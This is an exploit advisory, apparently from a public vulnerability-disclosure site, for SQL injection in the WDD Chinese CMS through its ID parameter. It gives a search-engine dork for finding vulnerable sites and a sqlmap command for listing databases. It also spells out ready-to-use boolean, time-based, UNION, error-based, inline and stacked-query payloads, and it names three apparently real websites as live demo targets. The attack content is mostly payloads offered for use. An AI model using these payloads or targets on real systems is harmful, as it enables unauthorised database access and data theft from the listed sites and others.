WDD CHINESE CMS SQL injection

2019.07.03
ir S I R M A X (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"DESIGNED BY WDD" inurl:ID=

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# # Exploit Title: WDD CHINESE CMS SQL injection # Date: 2019-07-3 # Google Dork : intext:"DESIGNED BY WDD" inurl:ID= # Exploit Author: S I R M A X # Vendor Homepage: http://www.wddgroup.com # Version: All Version # Tested on: win,linux #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# [SQL injection] [+] Method ( Sql injection ) Storm Security Team of IRAN [+] parameter : ID == php?ID= ================================================================================= [+] Sqlmap: [-] sqlmap -u "http://victim.com/product.php?KindID=1&ID=" -p ID --dbs [#] Testing Method: [+] - boolean-based blind [+] - time-based blind [+] - error-based [+] - UNION query [+] - inline query [+] - stacked queries -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ||||||||||||||||||||||| Parameter: ID (GET) || ||||||||||||||||||||||| Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: KindID=1&ID=6 AND 9460=9460 -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: KindID=1&ID=6 AND SLEEP(5) -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: KindID=1&ID=-9428 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(12 0)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(120)+CHAR(107)+CHAR(119)+CHAR(73)+CHAR(76)+CHAR(72)+CHAR(72)+CHAR(101)+CHAR(114)+CHAR(119)+CHAR(121)+CHAR(72)+CHAR(77)+CHAR(118)+CHAR(112)+CHAR(83)+CHAR(111)+CHAR(81)+CHAR(84)+CHAR(67)+CHAR(110)+CHAR(72)+CHAR(82)+CHAR(75)+CHAR(102)+CHAR(78)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(78)+CHAR(75)+CHAR(109)+CHAR(99)+CHAR(112)+CHAR(82)+CHAR(80)+CHAR(90)+CHAR(87)+CHAR(107)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aXFY -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: KindID=1&ID=6 AND (SELECT 2082 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(2082=2082,1))),0x716a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: KindID=1&ID=(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)) -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: KindID=1&ID=138;WAITFOR DELAY '0:0:5'-- -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ================================================================================= Demo: [+] https://www.crmto.com/news.php?KindID=1&ID=6[SQL] [+] http://www.catchertw.com.tw/company_news_more.aspx?KindID=1&ID=138[SQL] [+] http://www.navjack.com/product.php?KindID=36&ID=127[SQL] ================================================================================= [=] T.me/Sir_Max [=] Telegram Channel ==> @Storm_Security #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top